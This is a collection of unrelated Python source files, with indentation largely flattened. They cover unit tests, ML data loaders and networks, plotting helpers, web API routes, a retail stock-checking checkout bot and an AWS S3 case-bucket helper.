class TestStringToBytesParser(bspump.unittest.ProcessorTestCase):
def test_string_to_bytes_parser(self):
events = {
(None, 'some string'),
(None, 'another string'),
(None, 'last string'),
}
self.set_up_processor(bspump.common.StringToBytesParser)
output = self.execute(
events
)
self.assertEqual(
sorted([event for context, event in output]),
[b"another string", b"last string", b"some string"]
)
def test_event_not_string(self):
events = [
(None, b"Not a string"),
]
self.set_up_processor(bspump.common.StringToBytesParser)
output = self.execute(events)
self.assertTrue(self.Pipeline.is_error())
self.assertEqual(
[event for context, event in output],
[]
)
class TestBytesToStringParser(bspump.unittest.ProcessorTestCase):
def test_bytes_to_string_parser(self):
events = {
(None, b'some bytes'),
(None, b'another bytes'),
(None, b'last bytes'),
}
self.set_up_processor(bspump.common.BytesToStringParser)
output = self.execute(
events
)
self.assertListEqual(
sorted([event for context, event in output]),
["another bytes", "last bytes", "some bytes"]
)
def test_event_not_bytes(self):
events = [
(None, "Not a bytes"),
]
self.set_up_processor(bspump.common.BytesToStringParser)
bspump.pipeline.L = MagicMock() # turn off logging
output = self.execute(events)
self.assertTrue(self.Pipeline.is_error())
self.assertEqual(
[event for context, event in output],
[]
)
|
157389
|
import os
from pytorch_pretrained_bert.tokenization import BertTokenizer
import preprocess_pretraining
import torch
from utils import seek_random_offset
from random import random as rand
from random import randint, shuffle
class DataLoader():
""" Load sentence pair from corpus """
def __init__(self, file, batch_size, max_len, short_sampling_prob=0.1):
super().__init__()
self.f_pos = open(file, "r", encoding='utf-8', errors='ignore')
self.f_neg = open(file, "r", encoding='utf-8', errors='ignore')
self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
self.max_len = max_len
self.short_sampling_prob = short_sampling_prob
self.batch_size = batch_size
        self.preproc = preprocess_pretraining.PreProcess(max_len * 0.15, 0.15, max_len)
def read_tokens(self, f, length, discard_last_and_restart=True):
""" Read tokens from file pointer with limited length """
tokens = []
while len(tokens) < length:
line = f.readline()
if not line: # end of file
return None
if not line.strip():
if discard_last_and_restart:
continue
else:
return tokens
tokens.extend(self.tokenizer.tokenize(line.strip()))
return tokens
def __iter__(self): # iterator to load data
while True:
batch = []
for i in range(self.batch_size):
len_tokens = randint(1, int(self.max_len / 2)) \
if rand() < self.short_sampling_prob \
else int(self.max_len / 2)
is_next = rand() < 0.5 # whether token_b is next to token_a or not
tokens_a = self.read_tokens(self.f_pos, len_tokens, True)
seek_random_offset(self.f_neg)
f_next = self.f_pos if is_next else self.f_neg
tokens_b = self.read_tokens(f_next, len_tokens, False)
if tokens_a is None or tokens_b is None:
self.f_pos.seek(0, 0)
return
                data = (is_next, tokens_a, tokens_b)
                data = self.preproc(data)
                batch.append(data)
batch_tensors = [torch.tensor(x, dtype=torch.long) for x in zip(*batch)]
yield batch_tensors
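# Usage sketch (hedged): 'corpus.txt' is a placeholder path to a plain-text
# corpus with blank lines between documents; each yielded batch is a list of
# LongTensors, one per field produced by preprocess_pretraining.PreProcess.
if __name__ == '__main__':
    loader = DataLoader('corpus.txt', batch_size=32, max_len=128)
    for batch_tensors in loader:
        print([t.size() for t in batch_tensors])
        break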
|
157390
|
from django.urls import path
from . import views
from .views import AutoCreate
urlpatterns = [
path('owner/<int:owner_id>/', views.detail),
path('', AutoCreate.as_view())
]
|
157402
|
def login_required(func):
def not_logged_in(self, **kwargs):
self.send_login_required({'signin_required': 'you need to sign in'})
return
def check_user(self, **kwargs):
user = self.connection.user
if not user:
return not_logged_in(self, **kwargs)
return func(self, **kwargs)
return check_user
class RoutePermission(object):
def test_permission(self, handler, verb, **kwargs):
raise NotImplementedError("You need to implement test_permission")
def permission_failed(self, handler):
raise NotImplementedError("You need to implement permission_failed")
class LoginRequired(RoutePermission):
def __init__(self, verbs=None):
self.test_against_verbs = verbs
def test_permission(self, handler, verb, **kwargs):
if not self.test_against_verbs:
return handler.connection.user is not None
if self.test_against_verbs:
if verb not in self.test_against_verbs:
return True
user = handler.connection.user
return user is not None
def permission_failed(self, handler):
handler.send_login_required()
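# Usage sketch (hedged): `BaseHandler` and the routing framework are assumed;
# only the decorator and permission object below come from this module.
#
#   class NoteHandler(BaseHandler):
#       # reject unauthenticated POSTs; other verbs pass through
#       permissions = [LoginRequired(verbs=['post'])]
#
#       @login_required
#       def update(self, **kwargs):
#           ...  # self.connection.user is guaranteed non-None here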
|
157409
|
from flask_restplus import Namespace, reqparse, Resource
from flask import make_response, jsonify
from controller.manager import *
import os
name_space = Namespace("case-runner", description="Case Runner")
runner_param = reqparse.RequestParser()
runner_param.add_argument("status", required=True, type=str, location="json")
runner_param.add_argument("setting_path", required=False, type=str, location="json")
test_list_param = reqparse.RequestParser()
test_list_param.add_argument("file", required=True, type=str, location="json")
resource_param = reqparse.RequestParser()
resource_param.add_argument("file", required=True, type=str, location="json")
resource_param.add_argument("user", required=True, type=str, location="json")
def _get_response(result, message, code):
return make_response(jsonify({"Result": result, "Message": message}), code)
@name_space.route("")
class CaseRunnerApi(Resource):
@name_space.expect(runner_param)
@name_space.response(202, "Case Start Running")
@name_space.response(400, "Wrong Parameters")
def put(self):
arg = runner_param.parse_args()
if arg['status'].lower() == "start":
run_test()
return _get_response(True, "Test Started", 202)
elif arg['status'].lower() == "init":
init_engine()
load_settings(arg['setting_path'])
return _get_response(True, "Test Runner Initialized", 200)
else:
return _get_response(False, "Unknown Status", 400)
@name_space.route("/testlist")
class TestListApi(Resource):
@name_space.response(200, "Load Test List")
@name_space.response(400, "Wrong Parameters")
@name_space.response(500, "Error")
@name_space.expect(test_list_param)
def put(self):
arg = test_list_param.parse_args()
if not os.path.exists(arg['file']):
return _get_response(False, "Test List not found", 500)
try:
load_test_list(arg['file'])
return _get_response(True, "Test List loaded", 200)
except Exception as ex:
return _get_response(False, str(ex), 500)
@name_space.response(200, "Test List")
@name_space.response(500, "Error")
def get(self):
return make_response(jsonify(get_test_list()), 200)
@name_space.route("/resource")
class TestResourceApi(Resource):
@name_space.response(200, "Test Resource Loaded")
@name_space.response(400, "Wrong Parameters")
@name_space.response(500, "Error")
@name_space.expect(resource_param)
def put(self):
arg = resource_param.parse_args()
if not os.path.exists(arg['file']):
return _get_response(False, "Resource File", 500)
try:
load_resource(arg['file'], arg["user"])
return _get_response(True, "Test Resource loaded", 200)
except Exception as ex:
return _get_response(False, str(ex), 500)
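# Usage sketch (hedged): driving the API with `requests` against a local dev
# server; host, port, and file paths are placeholders.
#
#   import requests
#   base = 'http://localhost:5000/case-runner'
#   requests.put(base, json={'status': 'init', 'setting_path': '/tmp/settings.yaml'})
#   requests.put(base + '/testlist', json={'file': '/tmp/tests.txt'})
#   print(requests.get(base + '/testlist').json())
#   requests.put(base, json={'status': 'start'})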
|
157419
|
from AMZN import AMZN_BOT
from BSTBUY import BSTBUY_BOT
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from dotenv import load_dotenv
from selenium.common.exceptions import WebDriverException
import threading
import time
import os
load_dotenv()
# .env values are strings; compare explicitly so the string "False" is not truthy
USE_AMZN = os.getenv("USE_AMZN", "False").lower() == "true"
USE_BSTBUY = os.getenv("USE_BSTBUY", "False").lower() == "true"
# ------------------------------------------
# Webdriver setup
# Webdriver Options
chrome_options = Options()
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--ignore-ssl-errors')
AMZN_DRIVER_PATH = os.getcwd() + "\\chromedriver\\amazon_driver.exe"
BSTBUY_DRIVER_PATH = os.getcwd() + "\\chromedriver\\bstbuy_driver.exe"
try:
AMAZON = AMZN_BOT(webdriver.Chrome(AMZN_DRIVER_PATH, options=chrome_options))
BESTBUY = BSTBUY_BOT(webdriver.Chrome(BSTBUY_DRIVER_PATH, options=chrome_options))
except WebDriverException as err:
print(err)
print("\nPlease download two of the appropriate driver version @\nhttps://sites.google.com/a/chromium.org/chromedriver/downloads\
\nRename one webdriver amazon_driver, and the other bstbuy_driver.")
exit()
# ------------------------------------------
# Functions
# Perform setup for BstBuy & Amzn bots
def setup() :
# If "USE_AMZN" setting is set to True in .env file
if(USE_AMZN) :
        AMZN_SETUP_THREAD = threading.Thread(target=AMAZON.setup)  # pass the method itself, not its result
AMZN_SETUP_THREAD.start()
else :
AMAZON.close()
print("[AMAZON] Bot not in use. To fix, change settings in .env file")
# If "USE_BSTBUY" setting is set to True in .env file
if(USE_BSTBUY) :
        BSTBUY_SETUP_THREAD = threading.Thread(target=BESTBUY.setup)  # pass the method itself, not its result
BSTBUY_SETUP_THREAD.start()
else :
BESTBUY.close()
print("[BESTBUY] Bot not in use. To fix, change settings in .env file")
# If both bots are set to False in .env file
if ((not USE_AMZN) and (not USE_BSTBUY)) :
print("Both bots set to \"False\" in .env file. Exiting...")
exit()
# Join setup threads
if (USE_AMZN) :
AMZN_SETUP_THREAD.join()
if (USE_BSTBUY) :
BSTBUY_SETUP_THREAD.join()
# Checks if the product is in stock
# Returns boolean based on which bot has the item in stock
def stock_check() :
# Loop until product is in stock
while (True) :
AMZN_STOCK = AMAZON.check_in_stock()
BB_STOCK = BESTBUY.check_in_stock()
# If Amzn product is in stock
if (AMZN_STOCK) :
AMAZON.add_to_cart()
BESTBUY.close()
return True
# If BstBuy product is in stock
elif (BB_STOCK) :
BESTBUY.add_to_cart()
AMAZON.close()
return False
# If neither are in stock, sleep
else :
print("Sleeping " + os.getenv("page_refresh_timer") + " seconds...")
time.sleep(int(os.getenv("page_refresh_timer")))
# Runs setup, checks if the item is in stock, then purchases product
def main() :
setup()
check = stock_check()
if (check) :
AMAZON.checkout()
else :
BESTBUY.checkout()
# -------------------------
# Run
main()
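# Example .env (illustrative values; the variable names are the ones read via
# os.getenv above):
#   USE_AMZN=True
#   USE_BSTBUY=True
#   page_refresh_timer=30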
|
157447
|
import numpy as np
import torch
import torchvision.utils as vutils
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
#import pandas as pd
import seaborn as sns
sns.set()
sns.set_style('whitegrid')
sns.set_palette('colorblind')
def convert_npimage_torchimage(image):
return 255*torch.transpose(torch.transpose(torch.from_numpy(image), 0, 2), 1, 2)
def get_scatter_plot(data, labels=None, n_classes=None, num_samples=1000, xlim=None, ylim=None):
'''
data : 2d points, batch_size x data_dim (numpy array)
labels : labels, batch_size (numpy array)
'''
batch_size, data_dim = data.shape
num_samples = min(num_samples, batch_size)
if labels is None:
        labels = np.zeros(batch_size, dtype=int)  # np.int was removed in NumPy 1.24
if n_classes is None:
n_classes = len(np.unique(labels))
# sub-samples
if num_samples != batch_size:
indices = np.random.permutation(batch_size)
data = data[indices[:num_samples]]
labels = labels[indices[:num_samples]]
# init config
palette = sns.color_palette(n_colors=n_classes)
palette = [palette[i] for i in np.unique(labels)]
# plot
fig, ax = plt.subplots(figsize=(5, 5))
data = {'x': data[:, 0],
'y': data[:, 1],
'class': labels}
sns.scatterplot(x='x', y='y', hue='class', data=data, palette=palette)
# set config
if xlim is not None:
plt.xlim((-xlim, xlim))
if ylim is not None:
plt.ylim((-ylim, ylim))
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
    image = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)  # np.fromstring is deprecated for binary data
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_data_for_quiver_plot(val, num):
_x = np.linspace(-val, val, num)
_y = np.linspace(-val, val, num)
_u, _v = np.meshgrid(_x, _y)
_vis_data = np.stack([_u.reshape(num**2), _v.reshape(num**2)], axis=1)
vis_data = torch.from_numpy(_vis_data).float()
return vis_data, _x, _y
def get_quiver_plot(vec, x_pos, y_pos, xlim=None, ylim=None, scale=None):
'''
vec : 2d points, batch_size x data_dim (numpy array)
pos : 2d points, batch_size x data_dim (numpy array)
'''
grid_size = x_pos.shape[0]
batch_size = vec.shape[0]
assert batch_size == grid_size**2
assert y_pos.shape[0] == grid_size
# get x, y, u, v
X = x_pos #np.arange(-10, 10, 1)
Y = y_pos #np.arange(-10, 10, 1)
#U, V = np.meshgrid(X, Y)
U = vec[:, 0].reshape(grid_size, grid_size)
V = vec[:, 1].reshape(grid_size, grid_size)
# plot
fig, ax = plt.subplots(figsize=(5, 5))
q = ax.quiver(X, Y, U, V, pivot='mid', scale=scale)
#ax.quiverkey(q, X=0.3, Y=1.1, U=10,
# label='Quiver key, length = 10', labelpos='E')
# set config
if xlim is not None:
plt.xlim((-xlim, xlim))
if ylim is not None:
plt.ylim((-ylim, ylim))
# tight
plt.tight_layout()
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
    image = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_data_for_heatmap(val=4, num=256):
_x = np.linspace(-val, val, num)
_y = np.linspace(-val, val, num)
_u, _v = np.meshgrid(_x, _y)
_data = np.stack([_u.reshape(num**2), _v.reshape(num**2)], axis=1)
return _data, _x, _y
def energy_to_unnormalized_prob(energy):
prob = torch.exp(-energy) # unnormalized prob
return prob
def get_prob_from_energy_func_for_vis(energy_func, val=4, num=256):
# get grid
_z, _, _ = get_data_for_heatmap(val=val, num=num)
z = torch.from_numpy(_z).float()
# run energy func
energy = energy_func(z)
prob = energy_to_unnormalized_prob(energy)
# convert to numpy array
_prob = prob.cpu().float().numpy()
_prob = _prob.reshape(num, num)
return _prob
def get_imshow_plot(prob, val=4, use_grid=True):
# plot
fig, ax = plt.subplots(figsize=(5, 5))
im = ax.imshow(prob, cmap='jet', extent=[-val, val, -val, val])
ax.grid(False)
if use_grid:
plt.xticks(np.arange(-val, val+1, step=1))
plt.yticks(np.arange(-val, val+1, step=1))
else:
plt.xticks([])
plt.yticks([])
# tight
plt.tight_layout()
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
    image = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_1d_histogram_plot(data, val=4, num=256, use_grid=True):
xmin = 0
xmax = val
# get data
x = data
# get histogram
hist, xedges = np.histogram(x, range=[xmin, xmax], bins=num)
# plot heatmap
fig, ax = plt.subplots(figsize=(5, 5))
im = ax.bar(xedges[:-1], hist, width=0.5)#, color='#0504aa',alpha=0.7)
ax.grid(False)
if use_grid:
plt.xticks(np.arange(0, val+1, step=1))
else:
plt.xticks([])
# tight
plt.tight_layout()
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
    image = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_2d_histogram_plot(data, val=4, num=256, use_grid=True):
xmin = -val
xmax = val
ymin = -val
ymax = val
# get data
x = data[:, 0]
y = data[:, 1]
# get histogram
heatmap, xedges, yedges = np.histogram2d(x, y, range=[[xmin, xmax], [ymin, ymax]], bins=num)
extent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]
# plot heatmap
fig, ax = plt.subplots(figsize=(5, 5))
im = ax.imshow(heatmap.T, extent=extent, cmap='jet')
ax.grid(False)
if use_grid:
plt.xticks(np.arange(-val, val+1, step=1))
plt.yticks(np.arange(-val, val+1, step=1))
else:
plt.xticks([])
plt.yticks([])
# tight
plt.tight_layout()
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
    image = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_grid_image(input, batch_size, nchannels, nheight, nwidth=None, ncol=8, pad_value=0, do_square=True):
'''
input : b x c x h x w (where h = w)
'''
if batch_size > ncol**2 and do_square:
input = input[:ncol**2, :, :, :]
batch_size = ncol**2
nwidth = nwidth if nwidth is not None else nheight
input = input.detach()
output = input.view(batch_size, nchannels, nheight, nwidth).clone().cpu()
output = vutils.make_grid(output, nrow=ncol, normalize=True, scale_each=True, pad_value=pad_value)
#output = vutils.make_grid(output, normalize=False, scale_each=False)
return output
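# Usage sketch (hedged): render a 2-D histogram of Gaussian samples to an RGB
# array, then wrap it as a CHW torch image (normalize to [0, 1] first so the
# 255x scaling in convert_npimage_torchimage does not overflow uint8).
if __name__ == '__main__':
    samples = np.random.randn(10000, 2)
    img = get_2d_histogram_plot(samples, val=4, num=128)  # H x W x 3, uint8
    timg = convert_npimage_torchimage(img.astype(np.float64) / 255.0)
    print(img.shape, timg.shape)  # (H, W, 3) and torch.Size([3, H, W])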
#def get_canvas(fig):
# fig.canvas.draw() # draw the canvas, cache the renderer
# image = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
# image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# return image
# # close figure
# plt.close()
#
#def get_contour_with_batch_size(model, batch_size=128, vmin=-10.0, vmax=10.0, title=None):
# model.eval()
# matplotlib.rcParams['xtick.direction'] = 'out'
# matplotlib.rcParams['ytick.direction'] = 'out'
# matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
#
# # tmp
# weight = next(model.parameters())
#
# # gen grid⋅
# delta = 0.1
# xv, yv = torch.meshgrid([torch.arange(vmin, vmax, delta), torch.arange(vmin, vmax, delta)])
# h = yv.size(0)
# w = xv.size(0)
# yv = yv.contiguous().view(-1)
# xv = xv.contiguous().view(-1)
# input = torch.cat([xv.unsqueeze(1), yv.unsqueeze(1)], dim=1).to(weight.device)
#
# # forward
# prob = model.prob(input, batch_size=batch_size)
#
# # convert torch variable to numpy array
# xv = xv.cpu().numpy().reshape(h, w)
# yv = yv.cpu().numpy().reshape(h, w)
# zv = prob.detach().cpu().numpy().reshape(h, w)
#
# # plot and save⋅
# fig = plt.figure()
# CS1 = plt.contourf(xv, yv, zv)
# CS2 = plt.contour(xv, yv, zv, alpha=.7, colors='k')
# plt.clabel(CS2, inline=1, fontsize=10, colors='k')
# #plt.title('Simplest default with labels')
# if title is not None:
# plt.title(title)
# #plt.savefig(filename)
# #plt.close()
# image = get_canvas(fig)
# plt.close()
#
# return image
#
##def get_contour_with_data(model, data, vmin=-10.0, vmax=10.0, title=None):
## model.eval()
## matplotlib.rcParams['xtick.direction'] = 'out'
## matplotlib.rcParams['ytick.direction'] = 'out'
## matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
##
## # gen grid⋅
## delta = 0.1
## xv, yv = torch.meshgrid([torch.arange(vmin, vmax, delta), torch.arange(vmin, vmax, delta)])
## h = yv.size(0)
## w = xv.size(0)
## yv = yv.contiguous().view(-1)
## xv = xv.contiguous().view(-1)
## input = torch.cat([xv.unsqueeze(1), yv.unsqueeze(1)], dim=1).to(data.device)
##
## # forward
## prob = model.prob(input, data)
##
## # convert torch variable to numpy array
## xv = xv.cpu().numpy().reshape(h, w)
## yv = yv.cpu().numpy().reshape(h, w)
## zv = prob.detach().cpu().numpy().reshape(h, w)
##
## # plot and save⋅
## fig = plt.figure()
## CS1 = plt.contourf(xv, yv, zv)
## CS2 = plt.contour(xv, yv, zv, alpha=.7, colors='k')
## plt.clabel(CS2, inline=1, fontsize=10, colors='k')
## #plt.title('Simplest default with labels')
## if title is not None:
## plt.title(title)
## #plt.savefig(filename)
## #plt.close()
## image = get_canvas(fig)
## plt.close()
##
## return image
#
#def get_contour_with_z(model, z, vmin=-10.0, vmax=10.0, title=None):
# model.eval()
# matplotlib.rcParams['xtick.direction'] = 'out'
# matplotlib.rcParams['ytick.direction'] = 'out'
# matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
#
# # gen grid⋅
# delta = 0.1
# xv, yv = torch.meshgrid([torch.arange(vmin, vmax, delta), torch.arange(vmin, vmax, delta)])
# h = yv.size(0)
# w = xv.size(0)
# yv = yv.contiguous().view(-1)
# xv = xv.contiguous().view(-1)
# input = torch.cat([xv.unsqueeze(1), yv.unsqueeze(1)], dim=1).to(z.device)
#
# # forward
# prob = model.prob(input, z=z)
#
# # convert torch variable to numpy array
# xv = xv.cpu().numpy().reshape(h, w)
# yv = yv.cpu().numpy().reshape(h, w)
# zv = prob.detach().cpu().numpy().reshape(h, w)
#
# # plot and save⋅
# fig = plt.figure()
# CS1 = plt.contourf(xv, yv, zv)
# CS2 = plt.contour(xv, yv, zv, alpha=.7, colors='k')
# plt.clabel(CS2, inline=1, fontsize=10, colors='k')
# #plt.title('Simplest default with labels')
# if title is not None:
# plt.title(title)
# #plt.savefig(filename)
# #plt.close()
# image = get_canvas(fig)
# plt.close()
#
# return image
|
157458
|
from pyULIS4 import *
import math
# Keep in mind the coordinate system
# starts at (0;0) in the bottom left
# corner, since we are working in an
# OpenGL context.
pool = FThreadPool()
queue = FCommandQueue( pool )
fmt = Format_RGBA8
ctx = FContext( queue, fmt )
canvas = FBlock( 800, 600, fmt )
temp = FBlock( 800, 600, fmt )
elapsed = 0.0
# Called once at the beginning of play.
def start():
global fmt
global ctx
global canvas
# Called every frame during play.
def update( delta ):
global fmt
global ctx
global canvas
global elapsed
elapsed += delta
radius = ( ( math.sin( elapsed / 1 ) + 1 ) * 100 )
eventFill = FEvent()
eventClear = FEvent()
eventCircle = FEvent()
ctx.Fill( canvas, FColor.White, event = eventFill )
ctx.Clear( temp, event = eventClear )
ctx.Finish()
ctx.DrawCircleBresenhamSP( temp, FVec2F( 400, 300 ), radius, FColor.Black, True, waitList = [ eventFill, eventClear ], event = eventCircle )
ctx.Finish()
ctx.Blend( temp, canvas, waitList = [ eventCircle ] )
ctx.Finish()
|
157485
|
import torch
import numpy as np
class FFNet(torch.nn.Module):
"""Simple class to implement a feed-forward neural network in PyTorch.
Attributes:
layers: list of torch.nn.Linear layers to be applied in forward pass.
activation: activation function to be applied between layers.
"""
def __init__(self,shape,activation=None):
"""Constructor for FFNet.
Arguments:
shape: list of ints describing network shape, including input & output size.
activation: a torch.nn function specifying the network activation.
"""
super(FFNet, self).__init__()
self.shape = shape
self.layers = []
self.activation = activation ##TODO(pculbertson): make it possible use >1 activation... maybe? who cares
for ii in range(0,len(shape)-1):
self.layers.append(torch.nn.Linear(shape[ii],shape[ii+1]))
self.layers = torch.nn.ModuleList(self.layers)
def forward(self, x):
"Performs a forward pass on x, a numpy array of size (-1,shape[0])"
for ii in range(0,len(self.layers)-1):
x = self.layers[ii](x)
if self.activation:
x = self.activation(x)
return self.layers[-1](x)
class CNNet(torch.nn.Module):
"""PyTorch Module which implements a combined CNN-feedforward network for node classification.
Attributes:
conv_layers: ModuleList of Conv2d layers for CNN forward pass.
ff_layers: ModuleList of Linear layers for feedforward pass.
pool_layers: ModuleList of MaxPool2d layers for CNN forward pass. Contains Nones if no pooling.
kernel: list of kernel sizes for CNN layers.
stride: list of strides for CNN layers.
padding: list of paddings for CNN layers.
conv_activation: activation function to be applied between CNN layers
ff_activation: activation function to be applied between feedforward layers.
"""
def __init__(self,num_features,channels,ff_shape, input_size, kernel=2,stride=2, padding=0,
conv_activation=None,ff_activation=None,pool=None):
"""Constructor for CNNet.
Arguments:
num_features: length of node feature vector.
channels: vector of length N+1 specifying # of channels for each convolutional layer,
where N is number of conv layers. channels[0] should be the size of the input image.
ff_shape: vector specifying shape of feedforward network. ff_shape[0] should be
the size of the first hidden layer; constructor does the math to determine ff input size.
input_size: tuple of input image size, (W1, H1)
kernel: vector (or scalar) of kernel sizes for each conv layer. if scalar, each layer
uses the same kernel.
stride: vector (or scalar) of strides for each conv layer. uniform stride if scalar.
padding: vector (or scalar) of paddings for each conv layer. uniform if scalar.
conv_activation: nonlinear activation to be used after each conv layer
ff_activation: nonlinear activation to be used after each ff layer
pool: pooling to be added after each layer. if None, no pooling. if scalar, same pooling for each layer.
"""
super(CNNet, self).__init__()
N = len(channels)-1 #number of conv layers
        if type(kernel) is int:
            self.kernel = [kernel]*N
        else:
            self.kernel = kernel
        if type(stride) is int:
            self.stride = [stride]*N
        else:
            self.stride = stride
        if type(padding) is int:
            self.padding = [padding]*N
        else:
            self.padding = padding
        # a scalar (or None) pool is broadcast to every conv layer; a list is used as-is
        if pool is None or type(pool) is int:
            self.pool = [pool]*N
        else:
            self.pool = pool
self.conv_activation = conv_activation
self.ff_activation = ff_activation
self.conv_layers = []
self.pool_layers = []
self.ff_layers = []
W, H = input_size
for ii in range(0,len(channels)-1):
self.conv_layers.append(torch.nn.Conv2d(channels[ii],channels[ii+1],self.kernel[ii],
stride=self.stride[ii],padding=self.padding[ii]))
W = int(1+(W-self.kernel[ii]+2*self.padding[ii])/self.stride[ii])
H = int(1+(H-self.kernel[ii]+2*self.padding[ii])/self.stride[ii])
if self.pool[ii]:
if W % self.pool[ii] != 0 or H % self.pool[ii] != 0:
raise ValueError('trying to pool by non-factor')
                W, H = W // self.pool[ii], H // self.pool[ii]  # integer division keeps layer sizes ints
self.pool_layers.append(torch.nn.MaxPool2d(self.pool[ii]))
else:
self.pool_layers.append(None)
cnn_output_size = W*H*channels[-1]+num_features
shape = np.concatenate(([cnn_output_size], ff_shape))
for ii in range(0,len(shape)-1):
self.ff_layers.append(torch.nn.Linear(shape[ii],shape[ii+1]))
self.conv_layers = torch.nn.ModuleList(self.conv_layers)
self.ff_layers = torch.nn.ModuleList(self.ff_layers)
if pool:
self.pool_layers = torch.nn.ModuleList(self.pool_layers)
def forward(self, image_batch, feature_batch):
"""Performs a network forward pass on images/features. Images go through CNN, these features are
concatenated with the real-valued features, and passed through feed-forward network.
Arguments:
image_batch: batch of images (as a torch.Tensor of floats) to be passed through, of size [B,W1,H1,C1],
where B is the batch_size, (W1,H1) and C1 are the input_size and channels[0] passed during initialization.
feature_batch: batch of real-valued features (torch.Tensor of floats), of size [B,N], where N is the num_features
passed during initialization.
Usage: cnn = CNNet(...); outs = cnn(images_in,features_in)
"""
x = image_batch
for ii in range(0,len(self.conv_layers)):
x = self.conv_layers[ii](x)
if self.conv_activation:
x = self.conv_activation(x)
if self.pool_layers[ii]:
x = self.pool_layers[ii](x)
x = torch.flatten(x,start_dim=1)
x = torch.cat((x,feature_batch),dim=1)
for ii in range(0,len(self.ff_layers)-1):
x = self.ff_layers[ii](x)
if self.ff_activation:
x = self.ff_activation(x)
return self.ff_layers[-1](x)
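# Usage sketch (hedged; all sizes below are illustrative):
if __name__ == '__main__':
    net = FFNet([4, 32, 2], activation=torch.nn.functional.relu)
    print(net(torch.randn(8, 4)).shape)  # torch.Size([8, 2])

    cnn = CNNet(num_features=3, channels=[1, 8], ff_shape=[16, 2],
                input_size=(28, 28), kernel=4, stride=2, padding=1,
                conv_activation=torch.nn.functional.relu,
                ff_activation=torch.nn.functional.relu)
    out = cnn(torch.randn(8, 1, 28, 28), torch.randn(8, 3))
    print(out.shape)  # torch.Size([8, 2])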
|
157528
|
from library.api.db import EntityModel, db
class JobsRecord(EntityModel):
ACTIVE = 0
DISABLE = 1
job_id = db.Column(db.String(100)) # Job id
    result = db.Column(db.String(1000))  # Job result
log = db.Column(db.Text) # Job log
|
157574
|
import uuid
"""Class to create the cases s3 bucket for asset storage"""
class CaseBucket(object):
def __init__(self, case_number, region, client, resource):
self.region = region
self.case_number = case_number
self.client = client
self.s3 = resource.connect()
self.bucket = self.find_or_create_by()
def find_or_create_by(self):
bucket = self._locate_bucket()
if bucket is not None:
return bucket
else:
self.bucket_name = self._generate_name()
bucket = self._create_s3_bucket()
self._set_acls(self.bucket_name)
self._set_tags(self.bucket_name)
self._set_versioning(self.bucket_name)
return bucket
def cleanup_empty_buckets(self):
buckets = self.client.list_buckets()
for bucket in buckets['Buckets']:
if str(bucket['Name']).find('cloud-response') != -1:
try:
self.client.delete_bucket(Bucket=bucket['Name'])
print(bucket['Name'])
except Exception:
pass
def _generate_name(self):
bucket_name = 'cloud-response-' + str(uuid.uuid4()).replace('-', '')
return bucket_name
def _create_s3_bucket(self):
# the if statement is to prevent
# a fun little bug https://github.com/boto/boto3/issues/125
if self.region == 'us-east-1':
bucket = self.s3.create_bucket(
Bucket=self.bucket_name
)
else:
bucket = self.s3.create_bucket(
Bucket=self.bucket_name,
CreateBucketConfiguration={
'LocationConstraint': self.region
}
)
return bucket
def _set_acls(self, bucket_name):
self.s3.BucketAcl(bucket_name).put(ACL='bucket-owner-full-control')
def _set_tags(self, bucket_name):
self.client.put_bucket_tagging(
Bucket=bucket_name,
Tagging=dict(
TagSet=[
dict(
Key='cr-case-number',
Value=self.case_number
)
]
)
)
def _set_versioning(self, bucket_name):
self.client.put_bucket_versioning(
Bucket=bucket_name,
VersioningConfiguration=dict(
MFADelete='Disabled',
Status='Enabled'
)
)
    def _locate_bucket(self):
        buckets = self.s3.buckets.all()
        for bucket in buckets:
            if bucket.name.startswith("cloud-response-"):
                tags = self._get_bucket_tags(bucket.name)
                if self._check_tags(tags):
                    return bucket
        # keep scanning the remaining buckets; only report None when nothing matched
        return None
def _get_bucket_tags(self, bucket):
try:
s3 = self.client
response = s3.get_bucket_tagging(
Bucket=bucket,
)
except Exception:
response = None
return response
    def _check_tags(self, tag_object):
        if tag_object is None:
            return False
        # scan every tag; the previous loop returned False on the first mismatch
        for tag in tag_object.get('TagSet', []):
            if tag['Value'] == self.case_number:
                return True
        return False
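# Usage sketch (hedged): the constructor expects an object whose connect()
# returns a boto3 S3 service resource, so a raw boto3 resource needs a small
# adapter; the client, region, and case number below are illustrative.
#
#   import boto3
#
#   class ResourceAdapter:
#       def connect(self):
#           return boto3.resource('s3')
#
#   client = boto3.client('s3', region_name='us-east-1')
#   case_bucket = CaseBucket('case-1234', 'us-east-1', client, ResourceAdapter())
#   print(case_bucket.bucket.name)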
|
157603
|
import logging
import os
import requests
from typing import Any, List, Optional, Text, Dict
import rasa.utils.endpoints as endpoints_utils
from rasa.shared.nlu.constants import ENTITIES, TEXT
from rasa.nlu.config import RasaNLUModelConfig
from rasa.nlu.extractors.extractor import EntityExtractor
from rasa.nlu.model import Metadata
